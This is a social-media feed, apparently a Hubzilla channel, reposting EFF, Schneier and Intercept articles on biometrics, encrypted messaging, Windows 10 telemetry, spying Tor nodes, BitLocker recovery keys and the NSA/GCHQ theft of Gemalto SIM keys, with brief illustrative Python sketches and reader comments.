
Seth Martin
  last edited: Fri, 21 Apr 2017 18:02:48 -0500  
Once more, with passion: Fingerprints suck as passwords

Biometric data is identity (public), never authentication (secret). You leave a copy of your fingerprints literally on everything you touch.


#Privacy #Security #Passwords #Cybersecurity #Biometrics @Gadget Gurus+ @LibertyPod+
  
So while it's easy to update your password or get a new credit card number, you can't get a new finger.

https://www.schneier.com/blog/archives/2015/10/stealing_finger.html

And ten years ago, the CCC showed how easily a fingerprint can be faked with superglue and wood glue:
https://www.youtube.com/watch?v=OPtzRQNHzl0 (sorry, the video is in German).
  
But (!) fingerprints do work well for letting security agencies track you around.

I believe that is the reason for the push for biometrics, and fingerprint scanners in particular.

I'm skeptical of most security features originating from Facebook, Apple, Google, or Microsoft.

Seth Martin
  
The Internet Health Report



Welcome to Mozilla’s new open source initiative to document and explain what’s happening to the health of the Internet. Combining research from multiple sources, we collect data on five key topics and offer a brief overview of each.


#Decentralization #Privacy #Internet #Security #Cybersecurity #Mozilla @LibertyPod+ @Gadget Guru+

Seth Martin
  
Deeplinks wrote the following post Thu, 29 Dec 2016 18:10:08 -0600

Secure Messaging Takes Some Steps Forward, Some Steps Back: 2016 In Review

This year has been full of developments in messaging platforms that employ encryption to protect users. 2016 saw an increase in the level of security for some major messaging services, bringing end-to-end encryption to over a billion people. Unfortunately, we’ve also seen major platforms making poor decisions for users and potentially undermining the strong cryptography built into their apps.

WhatsApp makes big improvements, but concerning privacy changes
In late March, the Facebook-owned messaging service WhatsApp introduced end-to-end encryption for its over 1 billion monthly active users. The enormous significance of rolling out strong encryption to such a large user base was amplified by the fact that underlying WhatsApp’s new feature was the Signal Protocol, a well-regarded and independently reviewed encryption protocol. WhatsApp was not only protecting users’ chats, but also doing so with one of the best end-to-end encrypted messaging protocols out there. At the time, we praised WhatsApp and created a guide for both iOS and Android on how you could protect your communications using it.

In August, however, we were alarmed to see WhatsApp establish data-sharing practices that signaled a shift in its attitude toward user privacy. In its first privacy policy change since 2012, WhatsApp laid the groundwork for expanded data-sharing with its parent company, Facebook. This change allows Facebook access to several pieces of users’ WhatsApp information, including WhatsApp phone number, contact list, and usage data (e.g. when a user last used WhatsApp, what device it was used on, and what OS it was run on). This new data-sharing compounded our previous concerns about some of WhatsApp’s non-privacy-friendly default settings.

Signal takes steps forward
Meanwhile, the well-regarded end-to-end encryption app Signal, for which the Signal Protocol was created, has grown its user-base and introduced new features.  Available for iOS and Android (as well as desktop if you have either of the previous two), Signal recently introduced disappearing messages to its platform.  With this, users can be assured that after a chosen amount of time, messages will be deleted from both their own and their contact’s devices.

Signal also recently changed the way users verify their communications, introducing the concept of “safety numbers” to authenticate conversations and verify the long-lived keys of contacts in a more streamlined way.
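Under the hood, a safety number is just a short, human-comparable fingerprint derived from both parties’ long-term public identity keys; if the numbers both phones display match, no man-in-the-middle has swapped in a different key. Here is a minimal Python sketch of the idea (this is not Signal’s actual derivation, which iterates SHA-512 and mixes in the user identifier; the key values and function names are illustrative only):

```python
import hashlib

def fingerprint(identity_key: bytes) -> str:
    """Reduce one party's public identity key to a 30-digit fingerprint.
    Hypothetical sketch; Signal's real scheme iterates the hash many times."""
    digest = hashlib.sha512(identity_key).digest()
    # Map six 4-byte chunks of the digest to six 5-digit groups.
    return " ".join(
        str(int.from_bytes(digest[i:i + 4], "big") % 100000).zfill(5)
        for i in range(0, 24, 4)
    )

def safety_number(my_key: bytes, their_key: bytes) -> str:
    """Join the two fingerprints in sorted order so both parties
    compute the identical 60-digit number for the conversation."""
    return "  ".join(sorted([fingerprint(my_key), fingerprint(their_key)]))

# Both users compare this out-of-band (read aloud or scan as a QR code).
print(safety_number(b"alice-identity-key", b"bob-identity-key"))
```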

Mixed-mode messaging
2016 reminded us that it’s not as black-and-white as secure messaging apps vs. insecure ones. This year we saw several existing players in the messaging space add end-to-end encrypted options to their platforms. Facebook Messenger added “secret” messaging, and Google released its Allo messenger with an “incognito” mode. These end-to-end encrypted options co-exist in the apps alongside a default option that is only encrypted in transit.

Unfortunately, this “mixed mode” design may do more harm than good by teaching users the wrong lessons about encryption. Branding end-to-end encryption as “secret,” “incognito,” or “private” may encourage users to use end-to-end encryption only when they are doing something shady or embarrassing. And if end-to-end encryption is a feature that you only use when you want to hide or protect something, then the simple act of using it functions as a red flag for valuable, sensitive information. Instead, encryption should be an automatic, straightforward, easy-to-use status quo to protect all communications.

Further, mixing end-to-end encrypted modes with less sensitive defaults has been demonstrated to result in users making mistakes and inadvertently sending sensitive messages without end-to-end encryption.

In contrast, the end-to-end encrypted “letter sealing” that LINE expanded this year is enabled by default. Since first introducing it for 1-on-1 chats in 2015, LINE has made end-to-end encryption the default and progressively expanded the feature to group chats and 1-on-1 calls. Users can still send messages on LINE without end-to-end encryption by changing security settings, but the company recommends leaving the default “letter sealing” enabled at all times. This kind of default design makes it easier for users to communicate with encryption from the get-go, and much more difficult for them to make dangerous mistakes.

The dangers of insecure messaging
In stark contrast to the above-mentioned secure messaging apps, a November report from Citizen Lab exposes how China’s WeChat messenger performs selective censorship on its over 806 million monthly active users. When a user registers with a Chinese phone number, WeChat will censor content critical of the regime no matter where that user is. The censorship effectively “follows them around,” even if the user switches to an international phone number or leaves China to travel abroad. In effect, WeChat users may be under the control of China’s censorship regime no matter where they go.

Compared to the secure messaging practices EFF advocates for, WeChat represents the other end of the messaging spectrum, employing algorithms to control and limit access rather than using privacy-enhancing technologies to allow communication. This is an urgent reminder of how users can be put in danger when their communications are available to platform providers and governments, and why it is so important to continue promoting privacy-enhancing technologies and secure messaging.

This article is part of our Year In Review series. Read other articles about the fight for digital rights in 2016.



#Encryption #Privacy #Communications #Messaging #Security #WhatsApp #Signal #LINE #Allo #incognito  
@Gadget Guru+ @LibertyPod+
Mike Macgirvin
  
I tend to disagree about mixed mode messaging. We need a range of communication tools, from hush-hush ultra top secret to public and open. Both ends of the spectrum have problems. That's why you need privacy.
Seth Martin
  last edited: Mon, 02 Jan 2017 10:46:52 -0600  
I agree with you, Mike. I just think it's important for these messaging apps to have encryption on by default to curb authorities targeting those that use the feature selectively.
Fabián Bonetti
 
Mike, why do I have to leave my server to reply to you?

Seth Martin
  
Deeplinks wrote the following post Wed, 17 Aug 2016 09:12:52 -0500

With Windows 10, Microsoft Blatantly Disregards User Choice and Privacy: A Deep Dive



Microsoft had an ambitious goal with the launch of Windows 10: a billion devices running the software by the end of 2018. In its quest to reach that goal, the company aggressively pushed Windows 10 on its users and went so far as to offer free upgrades for a whole year. However, the company’s strategy for user adoption has trampled on essential aspects of modern computing: user choice and privacy. We think that’s wrong.

You don’t need to search long to come across stories of people who are horrified and amazed at just how far Microsoft has gone in order to increase Windows 10’s install base. Sure, there is some misinformation and hyperbole, but there are also some real concerns that current and future users of Windows 10 should be aware of. As the company is currently rolling out its “Anniversary Update” to Windows 10, we think it’s an appropriate time to focus on and examine the company’s strategy behind deploying Windows 10.

Disregarding User Choice

The tactics Microsoft employed to get users of earlier versions of Windows to upgrade to Windows 10 went from annoying to downright malicious. Some highlights: Microsoft installed an app in users’ system trays advertising the free upgrade to Windows 10. The app couldn’t be easily hidden or removed, but some enterprising users figured out a way. Then, the company kept changing the app and bundling it into various security patches, creating a cat-and-mouse game to uninstall it.

Eventually, Microsoft started pushing Windows 10 via its Windows Update system. It started off by pre-selecting the download for users and downloading it on their machines. Not satisfied, the company eventually made Windows 10 a recommended update so users receiving critical security updates were now also downloading an entirely new operating system onto their machines without their knowledge. Microsoft even rolled in the Windows 10 ad as part of an Internet Explorer security patch. Suffice to say, this is not the standard when it comes to security updates, and isn’t how most users expect them to work. When installing security updates, users expect to patch their existing operating system, and not see an advertisement or find out that they have downloaded an entirely new operating system in the process.

In May 2016, in an action designed in a way we think was highly deceptive, Microsoft actually changed the expected behavior of a dialog window, a user interface element that’s been around and acted the same way since the birth of the modern desktop. Specifically, when prompted with a Windows 10 update, if the user chose to decline it by hitting the ‘X’ in the upper right hand corner, Microsoft interpreted that as consent to download Windows 10.

Time after time, with each update, Microsoft chose to employ questionable tactics to cause users to download a piece of software that many didn’t want. What users actually wanted didn’t seem to matter. In an extreme case, members of a wildlife conservation group in the African jungle felt that the automatic download of Windows 10 on a limited bandwidth connection could have endangered their lives if a forced upgrade had begun during a mission.

Disregarding User Privacy

The trouble with Windows 10 doesn’t end with forcing users to download the operating system. By default, Windows 10 sends an unprecedented amount of usage data back to Microsoft, and the company claims most of it is to “personalize” the software by feeding it to the OS assistant called Cortana. Here’s a non-exhaustive list of data sent back: location data, text input, voice input, touch input, webpages you visit, and telemetry data regarding your general usage of your computer, including which programs you run and for how long.

While we understand that many users find features like Cortana useful, and that such features would be difficult (though not necessarily impossible) to implement in a way that doesn’t send data back to the cloud, the fact remains that many users would much prefer to opt out of these features in exchange for maintaining their privacy.

And while users can opt out of some of these settings, there is no guarantee that their computers will stop talking to Microsoft’s servers. A significant issue is the telemetry data the company receives. While Microsoft insists that it aggregates and anonymizes this data, it hasn’t explained just how it does so. Microsoft also won’t say how long this data is retained, instead providing only general timeframes. Worse yet, unless you’re an enterprise user, no matter what, you have to share at least some of this telemetry data with Microsoft and there’s no way to opt out of it.

Microsoft has tried to explain this lack of choice by saying that Windows Update won’t function properly on copies of the operating system with telemetry reporting turned to its lowest level. In other words, Microsoft is claiming that giving ordinary users more privacy by letting them turn telemetry reporting down to its lowest level would risk their security since they would no longer get security updates.[1] (Notably, this is not something many articles about Windows 10 have touched on.)

But this is a false choice that is entirely of Microsoft’s own creation. There’s no good reason why the types of data Microsoft collects at each telemetry level couldn’t be adjusted so that even at the lowest level of telemetry collection, users could still benefit from Windows Update and secure their machines from vulnerabilities, without having to send back things like app usage data or unique IDs like an IMEI number.

And if this wasn’t bad enough, Microsoft’s questionable upgrade tactics of bundling Windows 10 into various levels of security updates have also managed to lower users’ trust in the necessity of security updates. Sadly, this has led some people to forego security updates entirely, meaning that there are users whose machines are at risk of being attacked.

There’s no doubt that Windows 10 has some great security improvements over previous versions of the operating system. But it’s a shame that Microsoft made users choose between having privacy and security.

The Way Forward

Microsoft should come clean with its user community. The company needs to acknowledge its missteps and offer real, meaningful opt-outs to the users who want them, preferably in a single unified screen. It also needs to be straightforward in separating security updates from operating system upgrades going forward, and not try to bypass user choice and privacy expectations.

Otherwise it will face backlash in the form of individual lawsuits, state attorney general investigations, and government investigations.

We at EFF have heard from many users who have asked us to take action, and we urge Microsoft to listen to these concerns and incorporate this feedback into the next release of its operating system. Otherwise, Microsoft may find that it has inadvertently discovered just how far it can push its users before they abandon a once-trusted company for a better, more privacy-protective solution.
  • [1] Confusingly, Microsoft calls the lowest level of telemetry reporting (which is not available on Home or Professional editions of Windows 10) the “security” level—even though it prevents security patches from being delivered via Windows Update.


#Privacy #Security #Microsoft #Windows #Cybersecurity @Gadget Guru+ @LibertyPod+
kris
  
My main OS at home is kubuntu.

Seth Martin
  last edited: Sat, 21 Jan 2017 11:49:04 -0600  
Suspicion Confirmed.

Schneier on Security wrote the following post Fri, 08 Jul 2016 07:01:18 -0500

Researchers Discover Tor Nodes Designed to Spy on Hidden Services

Two researchers have discovered over 100 Tor nodes that are spying on hidden services. Cory Doctorow explains:
These nodes -- ordinary nodes, not exit nodes -- sorted through all the traffic that passed through them, looking for anything bound for a hidden service, which allowed them to discover hidden services that had not been advertised. These nodes then attacked the hidden services by making connections to them and trying common exploits against the server-software running on them, seeking to compromise and take them over.

The researchers used "honeypot" .onion servers to find the spying computers: these honeypots were .onion sites that the researchers set up in their own lab and then connected to repeatedly over the Tor network, thus seeding many Tor nodes with the information of the honions' existence. They didn't advertise the honions' existence in any other way and there was nothing of interest at these sites, and so when the sites logged new connections, the researchers could infer that they were being contacted by a system that had spied on one of their Tor network circuits.
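The detection logic is worth spelling out: because a honeypot address is never published anywhere, the only way a third party can learn it is by snooping it from the researchers’ own Tor circuits, so any inbound connection at all is a positive signal. A toy Python sketch of such a honeypot logger (hypothetical; the researchers’ actual “honion” tooling differs):

```python
# Toy honeypot behind an unadvertised Tor hidden service. Tor itself is
# configured separately (HiddenServiceDir/HiddenServicePort) to forward
# hidden-service traffic to this local port. Since the .onion address is
# never shared, every request logged here implies a snooping relay.
import logging
from http.server import BaseHTTPRequestHandler, HTTPServer

logging.basicConfig(filename="honion.log", level=logging.INFO)

class HonionHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Record evidence of the visit for later analysis.
        logging.info("unexpected visit: path=%s headers=%s",
                     self.path, dict(self.headers))
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"nothing of interest here\n")

HTTPServer(("127.0.0.1", 8080), HonionHandler).serve_forever()
```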

This attack was already understood as a theoretical problem for the Tor project, which had recently undertaken a rearchitecting of the hidden service system that would prevent it from taking place.

No one knows who is running the spying nodes: they could be run by criminals, governments, private suppliers of "infowar" weapons to governments, independent researchers, or other scholars (though scholarly research would not normally include attempts to hack the servers once they were discovered).

The Tor project is working on redesigning its system to block this attack.

Vice Motherboard article. Defcon talk announcement.


#Tor #Security #Cybersecurity #Spying #Surveillance @LibertyPod+  @Gadget Guru+
Kris
  
That is very sad news to hear. I'm a free software advocate; that is, “free” as in freedom. I very much enjoyed going to libertypod.org to use social media on a system that I knew respected my freedom. You facilitated a way for me and others to use a network run by volunteers and members of our community.

You and others actually cared about free speech and refused to allow all social life on the Internet to be turned into a commodity bought and sold from one master to another. You were not interested in impressing shareholders, and you were not interested in the surveillance of your users for money. Instead you were interested in an alternative way we could share ideas outside the control and risk of centralized censorship systems. You were interested in fighting the horrors of a tech society built without privacy and freedom in it. I saw things I was sure Facebook administrators would have deleted, and I rejoiced in the fact that we were so free that these things were not censored at a whim.

I am grateful to have been a part of this great community, made to increase the control of users over social networks. While I am unsure whether I will join another pod, use another network like GNU social, or something else, I still wanted to thank you, Seth, for all the work you have done to make this possible.
Vecchio Giac
  last edited: Tue, 19 Jul 2016 09:02:13 -0500  
Kris, if you also like open source and not just free (Stallman) software, Hubzilla is a fantastic option, a wonderful tool, much different from Diaspora, GNU social, etc...
Seth Martin
  
Kris, while you're here at lastauth.com, a Hubzilla website, try visiting https://lastauth.com/settings/featured and enabling the Diaspora protocol so you can communicate with people on Diaspora pods. We have a GNU social federation plugin as well. Give it a try and see what you think.

Seth Martin
  last edited: Sun, 03 Jan 2016 10:27:02 -0600  
The Intercept wrote the following post Mon, 28 Dec 2015 08:57:30 -0600

Recently Bought a Windows Computer? Microsoft Probably Has Your Encryption Key




One of the excellent features of new Windows devices is that disk encryption is built-in and turned on by default, protecting your data in case your device is lost or stolen. But what is less well-known is that, if you are like most users and log in to Windows 10 using your Microsoft account, your computer has automatically uploaded a copy of your recovery key – which can be used to unlock your encrypted disk – to Microsoft’s servers, probably without your knowledge and without an option to opt out.

During the “crypto wars” of the nineties, the National Security Agency developed an encryption backdoor technology – endorsed and promoted by the Clinton administration – called the Clipper chip, which they hoped telecom companies would use to sell backdoored crypto phones. Essentially, every phone with a Clipper chip would come with an encryption key, but the government would also get a copy of that key – this is known as key escrow – with the promise to only use it in response to a valid warrant. But due to public outcry and the availability of encryption tools like PGP, which the government didn’t control, the Clipper chip program ceased to be relevant by 1996. (Today, most phone calls still aren’t encrypted. You can use the free, open source, backdoorless Signal app to make encrypted calls.)

The fact that new Windows devices require users to backup their recovery key on Microsoft’s servers is remarkably similar to a key escrow system, but with an important difference. Users can choose to delete recovery keys from their Microsoft accounts (you can skip to the bottom of this article to learn how) – something that people never had the option to do with the Clipper chip system. But they can only delete it after they’ve already uploaded it to the cloud.

“The gold standard in disk encryption is end-to-end encryption, where only you can unlock your disk. This is what most companies use, and it seems to work well,” says Matthew Green, professor of cryptography at Johns Hopkins University. “There are certainly cases where it’s helpful to have a backup of your key or password. In those cases you might opt in to have a company store that information. But handing your keys to a company like Microsoft fundamentally changes the security properties of a disk encryption system.”

As soon as your recovery key leaves your computer, you have no way of knowing its fate. A hacker could have already hacked your Microsoft account and can make a copy of your recovery key before you have time to delete it. Or Microsoft itself could get hacked, or could have hired a rogue employee with access to user data. Or a law enforcement or spy agency could send Microsoft a request for all data in your account, which would legally compel them to hand over your recovery key, which they could do even if the first thing you do after setting up your computer is delete it.

As Green puts it, “Your computer is now only as secure as that database of keys held by Microsoft, which means it may be vulnerable to hackers, foreign governments, and people who can extort Microsoft employees.”

Of course, keeping a backup of your recovery key in your Microsoft account is genuinely useful for probably the majority of Windows users, which is why Microsoft designed the encryption scheme, known as “device encryption,” this way. If something goes wrong and your encrypted Windows computer breaks, you’re going to need this recovery key to gain access to any of your files. Microsoft would rather give their customers crippled disk encryption than risk their data.

“When a device goes into recovery mode and the user doesn’t have access to the recovery key the data on the drive will become permanently inaccessible. Based on the possibility of this outcome and a broad survey of customer feedback we chose to automatically backup the user recovery key,” a Microsoft spokesperson told me. “The recovery key requires physical access to the user device and is not useful without it.”

After you finish setting up your Windows computer, you can login to your Microsoft account and delete the recovery key. Is this secure enough? “If Microsoft doesn’t keep backups, maybe,” says Green. “But it’s hard to guarantee that. And for people who aren’t aware of the risk, opt-out seems risky.”

This policy is in stark contrast to that of Microsoft’s major competitor, Apple. New Macs also ship with built-in and default disk encryption: a technology known as FileVault. Like Microsoft, Apple lets you store a backup of your recovery key in your iCloud account. But in Apple’s case, it’s an option. When you set up a Mac for the first time, you can uncheck a box if you don’t want to send your key to Apple’s servers.

This policy is also in contrast to Microsoft’s premium disk encryption product called BitLocker, which isn’t the same thing as what Microsoft refers to as device encryption. When you turn on BitLocker you’re forced to make a backup of your recovery key, but you get three options: Save it in your Microsoft account, save it to a USB stick, or print it.

To fully understand the different disk encryption features that Windows offers, you need to know some Microsoft jargon. Windows comes in different editions: Home (the cheapest), Pro, and Enterprise (more expensive). Windows Home includes device encryption, which started to become available during Windows 8, and requires your computer to have a tamper-resistant chip that stores encryption keys, something all new PCs come with. Pro and Enterprise both include device encryption, and they also include BitLocker, which started to become available during Windows Vista, but only for the premium editions. Under the hood, device encryption and BitLocker are the same thing. The difference is there’s only one way to use device encryption, but BitLocker is configurable.

If you’re using a recent version of Windows, and your computer has the encryption chip, and if you have a Microsoft account, your disk will automatically get encrypted, and your recovery key will get sent to Microsoft. If you log in to Windows using your company’s or university’s Windows domain, then your recovery key will get sent to a server controlled by your company or university instead of Microsoft – but either way, you can’t prevent device encryption from sending your recovery key. If you choose not to use a Microsoft or a domain account at all and instead create a “local only” account, then you don’t get disk encryption.
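Reduced to a decision procedure, the behavior described in the last few paragraphs looks roughly like the following Python sketch (my paraphrase of the article, not Microsoft-documented logic):

```python
def recovery_key_destination(has_encryption_chip: bool, account: str) -> str:
    """Where the device-encryption recovery key ends up on a new Windows
    machine, per the behavior described above (hedged paraphrase)."""
    if not has_encryption_chip:
        return "no automatic device encryption"
    if account == "microsoft":
        return "disk encrypted; key uploaded to Microsoft's servers"
    if account == "domain":
        return "disk encrypted; key sent to your company's or university's server"
    # "Local only" accounts get no automatic disk encryption at all.
    return "no disk encryption"

print(recovery_key_destination(True, "microsoft"))
```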

BitLocker, on the other hand, gives you more control. When you turn on BitLocker you get the choice to store your recovery key locally, among other options. But if you buy a new Windows device, even if it supports BitLocker, you’ll be using device encryption when you first set it up, and you’ll automatically send your recovery key to Microsoft.

In short, there is no way to prevent a new Windows device from uploading your recovery key the first time you login to your Microsoft account, even if you have a Pro or Enterprise edition of Windows. And this is worse than just Microsoft choosing an insecure default option. Windows Home users don’t get the choice to not upload their recovery key at all. And while Windows Pro and Enterprise users do get the choice (because they can use BitLocker), they can’t exercise that choice until after they’ve already uploaded their recovery key to Microsoft’s servers.

How to delete your recovery key from your Microsoft account
Go to this website and log in to your Microsoft account – this will be the same username and password that you use to log in to your Windows device. Once you’re in, it will show you a list of recovery keys backed up to your account.

If any of your Windows devices are listed, this means that Microsoft, or anyone that manages to access data in your Microsoft account, is technically able to unlock your encrypted disk, without your consent, as long as they physically have your computer. You can go ahead and delete your recovery key on this page – but you may want to back it up locally first, for example by writing it down on a piece of paper that you keep somewhere safe.

If you don’t see any recovery keys, then you either don’t have an encrypted disk, or Microsoft doesn’t have a copy of your recovery key. This might be the case if you’re using BitLocker and didn’t upload your recovery key when you first turned it on.

When you delete your recovery key from your account on this website, Microsoft promises that it gets deleted immediately, and that copies stored on their backup drives get deleted shortly thereafter as well. “The recovery key password is deleted right away from the customer’s online profile. As the drives that are used for failover and backup are sync’d up with the latest data the keys are removed,” a Microsoft spokesperson assured me.

If you have sensitive data that’s stored on your laptop, in some cases it might be safer to completely stop using your old encryption key and generate a new one that you never send to Microsoft. This way you can be entirely sure that the copy that used to be on Microsoft’s server hasn’t already been compromised.

Generate a new encryption key without giving a copy to Microsoft
In order to generate a new disk encryption key, this time without giving a copy to Microsoft, you need to decrypt your whole hard disk and then re-encrypt it, but this time in such a way that you’ll actually get asked how you want to back up your recovery key.

This is only possible if you have Windows Pro or Enterprise. Unfortunately, the only thing you can do if you have the Home edition is upgrade to a more expensive edition or use non-Microsoft disk encryption software, such as BestCrypt, which you have to pay for. You may also be able to get open source encryption software like VeraCrypt working, but sadly the open source options for full disk encryption in Windows don’t currently work well with modern PC hardware (as touched on here).

Go to Start, type “bitlocker”, and click “Manage BitLocker” to open BitLocker Drive Encryption settings.


From here, click “Turn off BitLocker”. It will warn you that your disk will get decrypted and that it may take some time. Go ahead and continue. You can use your computer while it’s decrypting.


After your disk is finished decrypting, you need to turn BitLocker back on. Back in the BitLocker Drive Encryption settings, click “Turn on BitLocker”.


It will check to see if your computer supports BitLocker, and then it will ask you how you want to back up your recovery key. It sure would be nice if it asked you this when you first set up your computer.


If you choose to save it to a file, it will make you save it onto a disk that you’re not currently encrypting, such as a USB stick. Or you can choose to print it, and keep a hard copy. You must choose one of them to continue, but make sure you don’t choose “Save to your Microsoft account.”

On the next page it will ask you if you want to encrypt used disk space only (faster) or encrypt your entire disk including empty space (slower). If you want to be on the safe side, choose the latter. Then on the next page it will ask you if you wish to run the BitLocker system check, which you should probably do.

Finally, it will make you reboot your computer.

When you boot back up, your hard disk will be encrypting in the background. At this point you can check your Microsoft account again to see if Windows uploaded your recovery key – it shouldn’t have.


Now just wait for your disk to finish encrypting. Congratulations: Your disk is encrypted and Microsoft no longer has the ability to unlock it.



#Microsoft #Windows #Key Escrow #Encryption #Clipper Chip #Security @Gadget Guru+
Marshall Sutherland
  
When I upgraded some computers to Win10 for someone the other day, I have a vague recollection of being asked for a Microsoft account, but not having one, I must have cancelled out of that.

Seth Martin
  
The Intercept wrote the following post Thu, 19 Feb 2015 13:25:38 -0600
How Spies Stole the Keys to the Encryption Castle

AMERICAN AND BRITISH spies hacked into the internal computer network of the largest manufacturer of SIM cards in the world, stealing encryption keys used to protect the privacy of cellphone communications across the globe, according to top-secret documents provided to The Intercept by National Security Agency whistleblower Edward Snowden.

The hack was perpetrated by a joint unit consisting of operatives from the NSA and its British counterpart Government Communications Headquarters, or GCHQ. The breach, detailed in a secret 2010 GCHQ document, gave the surveillance agencies the potential to secretly monitor a large portion of the world’s cellular communications, including both voice and data.

The company targeted by the intelligence agencies, Gemalto, is a multinational firm incorporated in the Netherlands that makes the chips used in mobile phones and next-generation credit cards. Among its clients are AT&T, T-Mobile, Verizon, Sprint and some 450 wireless network providers around the world. The company operates in 85 countries and has more than 40 manufacturing facilities. One of its three global headquarters is in Austin, Texas and it has a large factory in Pennsylvania.

In all, Gemalto produces some 2 billion SIM cards a year. Its motto is “Security to be Free.”

With these stolen encryption keys, intelligence agencies can monitor mobile communications without seeking or receiving approval from telecom companies and foreign governments. Possessing the keys also sidesteps the need to get a warrant or a wiretap, while leaving no trace on the wireless provider’s network that the communications were intercepted. Bulk key theft additionally enables the intelligence agencies to unlock any previously encrypted communications they had already intercepted, but did not yet have the ability to decrypt.

As part of the covert operations against Gemalto, spies from GCHQ — with support from the NSA — mined the private communications of unwitting engineers and other company employees in multiple countries.

Gemalto was totally oblivious to the penetration of its systems — and the spying on its employees. “I’m disturbed, quite concerned that this has happened,” Paul Beverly, a Gemalto executive vice president, told The Intercept. “The most important thing for me is to understand exactly how this was done, so we can take every measure to ensure that it doesn’t happen again, and also to make sure that there’s no impact on the telecom operators that we have served in a very trusted manner for many years. What I want to understand is what sort of ramifications it has, or could have, on any of our customers.” He added that “the most important thing for us now is to understand the degree” of the breach.

Leading privacy advocates and security experts say that the theft of encryption keys from major wireless network providers is tantamount to a thief obtaining the master ring of a building superintendent who holds the keys to every apartment. “Once you have the keys, decrypting traffic is trivial,” says Christopher Soghoian, the principal technologist for the American Civil Liberties Union. “The news of this key theft will send a shock wave through the security community.”



Beverly said that after being contacted by The Intercept, Gemalto’s internal security team began on Wednesday to investigate how their system was penetrated and could find no trace of the hacks. When asked if the NSA or GCHQ had ever requested access to Gemalto-manufactured encryption keys, Beverly said, “I am totally unaware. To the best of my knowledge, no.”

According to one secret GCHQ slide, the British intelligence agency penetrated Gemalto’s internal networks, planting malware on several computers, giving GCHQ secret access. We “believe we have their entire network,” the slide’s author boasted about the operation against Gemalto.

Additionally, the spy agency targeted unnamed cellular companies’ core networks, giving it access to “sales staff machines for customer information and network engineers machines for network maps.” GCHQ also claimed the ability to manipulate the billing servers of cell companies to “suppress” charges in an effort to conceal the spy agency’s secret actions against an individual’s phone. Most significantly, GCHQ also penetrated “authentication servers,” allowing it to decrypt data and voice communications between a targeted individual’s phone and their telecom provider’s network. A note accompanying the slide asserted that the spy agency was “very happy with the data so far and [was] working through the vast quantity of product.”

The Mobile Handset Exploitation Team (MHET), whose existence has never before been disclosed, was formed in April 2010 to target vulnerabilities in cell phones. One of its main missions was to covertly penetrate computer networks of corporations that manufacture SIM cards, as well as those of wireless network providers. The team included operatives from both GCHQ and the NSA.

While the FBI and other U.S. agencies can obtain court orders compelling U.S.-based telecom companies to allow them to wiretap or intercept the communications of their customers, on the international front this type of data collection is much more challenging. Unless a foreign telecom or foreign government grants access to their citizens’ data to a U.S. intelligence agency, the NSA or CIA would have to hack into the network or specifically target the user’s device for a more risky “active” form of surveillance that could be detected by sophisticated targets. Moreover, foreign intelligence agencies would not allow U.S. or U.K. spy agencies access to the mobile communications of their heads of state or other government officials.

“It’s unbelievable. Unbelievable,” said Gerard Schouw, a member of the Dutch Parliament when told of the spy agencies’ actions. Schouw, the intelligence spokesperson for D66, the largest opposition party in the Netherlands, told The Intercept, “We don’t want to have the secret services from other countries doing things like this.” Schouw added that he and other lawmakers will ask the Dutch government to provide an official explanation and to clarify whether the country’s intelligence services were aware of the targeting of Gemalto, whose official headquarters is in Amsterdam.

Last November, the Dutch government amended its constitution to include explicit protection for the privacy of digital communications, including those made on mobile devices. “We have, in the Netherlands, a law on the [activities] of secret services. And hacking is not allowed,” he said. Under Dutch law, the interior minister would have to sign off on such operations by foreign governments’ intelligence agencies. “I don’t believe that he has given his permission for these kind of actions.”

The U.S. and British intelligence agencies pulled off the encryption key heist in great stealth, giving them the ability to intercept and decrypt communications without alerting the wireless network provider, the foreign government or the individual user that they have been targeted. “Gaining access to a database of keys is pretty much game over for cellular encryption,” says Matthew Green, a cryptography specialist at the Johns Hopkins Information Security Institute. The massive key theft is “bad news for phone security. Really bad news.”




AS CONSUMERS BEGAN to adopt cellular phones en masse in the mid-1990s, there were no effective privacy protections in place. Anyone could buy a cheap device from RadioShack capable of intercepting calls placed on mobile phones. The shift from analog to digital networks introduced basic encryption technology, though it was still crackable by tech savvy computer science graduate students, as well as the FBI and other law enforcement agencies, using readily available equipment.

Today, second-generation (2G) phone technology, which relies on a deeply flawed encryption system, remains the dominant platform globally, though U.S. and European cell phone companies now use 3G, 4G and LTE technology in urban areas. These include more secure, though not invincible, methods of encryption, and wireless carriers throughout the world are upgrading their networks to use these newer technologies.

It is in the context of such growing technical challenges to data collection that intelligence agencies, such as the NSA, have become interested in acquiring cellular encryption keys. “With old-fashioned [2G], there are other ways to work around cellphone security without those keys,” says Green, the Johns Hopkins cryptographer. “With newer 3G, 4G and LTE protocols, however, the algorithms aren’t as vulnerable, so getting those keys would be essential.”

The privacy of all mobile communications — voice calls, text messages and internet access — depends on an encrypted connection between the cell phone and the wireless carrier’s network, using keys stored on the SIM, a tiny chip smaller than a postage stamp which is inserted into the phone. All mobile communications on the phone depend on the SIM, which stores and guards the encryption keys created by companies like Gemalto. SIM cards can be used to store contacts, text messages, and other important data, like one’s phone number. In some countries, SIM cards are used to transfer money. As The Intercept reported last year, having the wrong SIM card can make you the target of a drone strike.

SIM cards were not invented to protect individual communications — they were designed to do something much simpler: ensure proper billing and prevent fraud, which was pervasive in the early days of cell phones. Soghoian compares the use of encryption keys on SIM cards to the way Social Security numbers are used today. “Social security numbers were designed in the 1930s to track your contributions to your government pension,” he says. “Today they are used as a quasi national identity number, which was never their intended purpose.”

Because the SIM card wasn’t created with call confidentiality in mind, the manufacturers and wireless carriers don’t make a great effort to secure their supply chain. As a result, the SIM card is an extremely vulnerable component of a mobile phone. “I doubt anyone is treating those things very carefully,” says Green. “Cell companies probably don’t treat them as essential security tokens. They probably just care that nobody is defrauding their networks.” The ACLU’s Soghoian adds, “These keys are so valuable that it makes sense for intel agencies to go after them.”

As a general rule, phone companies do not manufacture SIM cards, nor program them with secret encryption keys. It is cheaper and more efficient for them to outsource this sensitive step in the SIM card production process. They purchase them in bulk with the keys pre-loaded by other corporations. Gemalto is the largest of these SIM “personalization” companies.

